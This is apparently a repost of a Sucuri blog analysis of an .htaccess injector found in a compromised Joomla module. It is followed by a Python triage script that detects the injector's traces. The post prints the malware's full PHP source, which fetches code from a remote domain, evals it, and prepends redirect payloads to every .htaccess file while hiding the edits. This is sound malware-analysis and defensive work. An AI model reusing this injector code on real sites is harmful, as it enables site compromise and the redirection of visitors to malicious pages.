.htaccess Injector on Joomla and WordPress Websites

During the process of investigating one of our incident response cases, we found an .htaccess code injection. It had been widely spread on the website, injected into all .htaccess files and redirecting visitors to the http[:]//portal-f[.]pw/XcTyTp advertisement website.

Taking a Look at the .htaccess Injector Code

Below is the code within the ./modules/mod_widgetread_twitt/index.php file on a Joomla website. This code is responsible for injecting the malicious redirects into the .htaccess files:

<?php
// Note: $path and $page are never defined anywhere in this sample.
echo 'Wordpress ';
// Stage 1: prepend the remote payload to .htaccess in the current directory and
// in each of five parent directories, unless the file already contains
// "# BEGIN WORDPRESS". The same stanza is repeated six times.
$htac=file_get_contents('hXXp://recaptcha-in[.]pw/bash/x');
$fl="./.htaccess";
$lastData="";
if(file_exists($fl))$lastData=file_get_contents($fl);
if(!substr_count($lastData,"# BEGIN WORDPRESS")){
    $data=$htac."\r\n".$lastData;
    chmod($fl,0766);
    file_put_contents($fl,$data);
    touch($fl,filemtime($path));
    chmod($fl,0444);
    echo$page;
};
$htac=file_get_contents('hXXp://recaptcha-in[.]pw/bash/x');
$fl="../.htaccess";
$lastData="";
if(file_exists($fl))$lastData=file_get_contents($fl);
if(!substr_count($lastData,"# BEGIN WORDPRESS")){
    $data=$htac."\r\n".$lastData;
    chmod($fl,0766);
    file_put_contents($fl,$data);
    touch($fl,filemtime($path));
    chmod($fl,0444);
    echo$page;
};
$htac=file_get_contents('hXXp://recaptcha-in[.]pw/bash/x');
$fl="../../.htaccess";
$lastData="";
if(file_exists($fl))$lastData=file_get_contents($fl);
if(!substr_count($lastData,"# BEGIN WORDPRESS")){
    $data=$htac."\r\n".$lastData;
    chmod($fl,0766);
    file_put_contents($fl,$data);
    touch($fl,filemtime($path));
    chmod($fl,0444);
    echo$page;
};
$htac=file_get_contents('hXXp://recaptcha-in[.]pw/bash/x');
$fl="../../../.htaccess";
$lastData="";
if(file_exists($fl))$lastData=file_get_contents($fl);
if(!substr_count($lastData,"# BEGIN WORDPRESS")){
    $data=$htac."\r\n".$lastData;
    chmod($fl,0766);
    file_put_contents($fl,$data);
    touch($fl,filemtime($path));
    chmod($fl,0444);
    echo$page;
};
$htac=file_get_contents('hXXp://recaptcha-in[.]pw/bash/x');
$fl="../../../../.htaccess";
$lastData="";
if(file_exists($fl))$lastData=file_get_contents($fl);
if(!substr_count($lastData,"# BEGIN WORDPRESS")){
    $data=$htac."\r\n".$lastData;
    chmod($fl,0766);
    file_put_contents($fl,$data);
    touch($fl,filemtime($path));
    chmod($fl,0444);
    echo$page;
};
$htac=file_get_contents('hXXp://recaptcha-in[.]pw/bash/x');
$fl="../../../../../.htaccess";
$lastData="";
if(file_exists($fl))$lastData=file_get_contents($fl);
if(!substr_count($lastData,"# BEGIN WORDPRESS")){
    $data=$htac."\r\n".$lastData;
    chmod($fl,0766);
    file_put_contents($fl,$data);
    touch($fl,filemtime($path));
    chmod($fl,0444);
    echo$page;
};
echo' 
';
// Stage 2: fetch further PHP from the remote host and execute it.
eval(file_get_contents('hXXp://recaptcha-in[.]pw/bash/include/xtaccess'));
echo' ';
// Stage 3: recursively collect every .htaccess under the document root and
// prepend the payload to each one that does not already contain it.
set_time_limit(120);
$fileName=".htaccess";
$injectData="hXXp://recaptcha-in[.]pw/bash/x";
$filesArray=array();
function FindFiles($dir,&$fArray,&$searchFile){
    if($curdir=opendir($dir)){
        while(false!==($file=readdir($curdir))){
            if(($file==".")||($file==".."))continue;
            $filePath=$dir.DIRECTORY_SEPARATOR.$file;
            if(is_file($filePath))if($file!=$searchFile)continue;
            if(is_dir($filePath)){
                FindFiles($filePath,$fArray,$searchFile);
            }else{
                array_push($fArray,$filePath);
            }
        }
        closedir($curdir);
    }
    return true;
}
FindFiles($_SERVER["DOCUMENT_ROOT"],$filesArray,$fileName);
if(count($filesArray)>0){
    $injectData=file_get_contents($injectData);
    if(!empty($injectData)){
        foreach($filesArray as&$value){
            chmod($value,0777);
            if(is_writable($value)){
                // The original mtime is saved and restored so the edit does not show in listings.
                $fileDate=filemtime($value);
                $fileSource=file_get_contents($value);
                if(!strstr($fileSource,$injectData)){
                    $fileSource=$injectData."\r\n".$fileSource;
                    file_put_contents($value,$fileSource);
                    touch($value,$fileDate);
                }
            }
            chmod($value,0444);
        }
    }
};
echo'

END';

This code searches for .htaccess files.
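A triage sketch for the on-disk traces the injector above leaves behind (mode 0444, an mtime put back with touch(), a payload joined on with "\r\n"), added here as an example and not taken from the original post. It assumes a POSIX filesystem; CTIME_GAP, the function names and the demo files are constructed for illustration.

```python
import os
import stat
import tempfile

# Domains named in the write-up (defanged there; plain here for matching).
IOC_DOMAINS = (b"portal-f.pw", b"recaptcha-in.pw")
CTIME_GAP = 3600  # assumed threshold, in seconds

def check_htaccess(path):
    """Return the injector traces present on one .htaccess file."""
    st = os.stat(path)
    with open(path, "rb") as fh:
        body = fh.read()
    hits = []
    if stat.S_IMODE(st.st_mode) == 0o444:
        hits.append("mode-0444")           # injector finishes with chmod 0444
    if st.st_ctime - st.st_mtime > CTIME_GAP:
        hits.append("mtime-restored")      # touch() can set mtime back, not ctime
    if body.count(b"\n") > body.count(b"\r\n") > 0:
        hits.append("mixed-line-endings")  # payload is glued on with "\r\n"
    hits += ["ioc:" + d.decode() for d in IOC_DOMAINS if d in body.lower()]
    return hits

def scan(docroot):
    """Visit every .htaccess under docroot, as FindFiles() does; keep flagged ones."""
    paths = [os.path.join(d, ".htaccess")
             for d, _dirs, files in os.walk(docroot) if ".htaccess" in files]
    return {p: hits for p in paths if (hits := check_htaccess(p))}

def demo():
    """Constructed docroot: one clean file, one carrying the traces above."""
    root = tempfile.mkdtemp()
    clean = os.path.join(root, ".htaccess")
    bad = os.path.join(root, "modules", ".htaccess")
    os.mkdir(os.path.dirname(bad))
    for path, body in ((clean, b"Options -Indexes\n"),
                       (bad, b"# sample: portal-f.pw\r\nOptions -Indexes\n")):
        with open(path, "wb") as fh:       # constructed content, not the payload
            fh.write(body)
        os.chmod(path, 0o644)
    old = os.stat(bad).st_mtime - 86400
    os.utime(bad, (old, old))              # mimics touch($value,$fileDate)
    os.chmod(bad, 0o444)                   # mimics chmod($value,0444)
    return scan(root), clean, bad

if __name__ == "__main__":
    for path, hits in demo()[0].items():
        print(path, hits)
```

Unpacking an archive or restoring a backup also leaves ctime newer than mtime, so treat each hit as a lead to review by hand rather than as proof of infection.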

Continue reading .htaccess Injector on Joomla and WordPress Websites at Sucuri Blog.

Story added 23 May 2019; the content source with the full text can be found at the link above.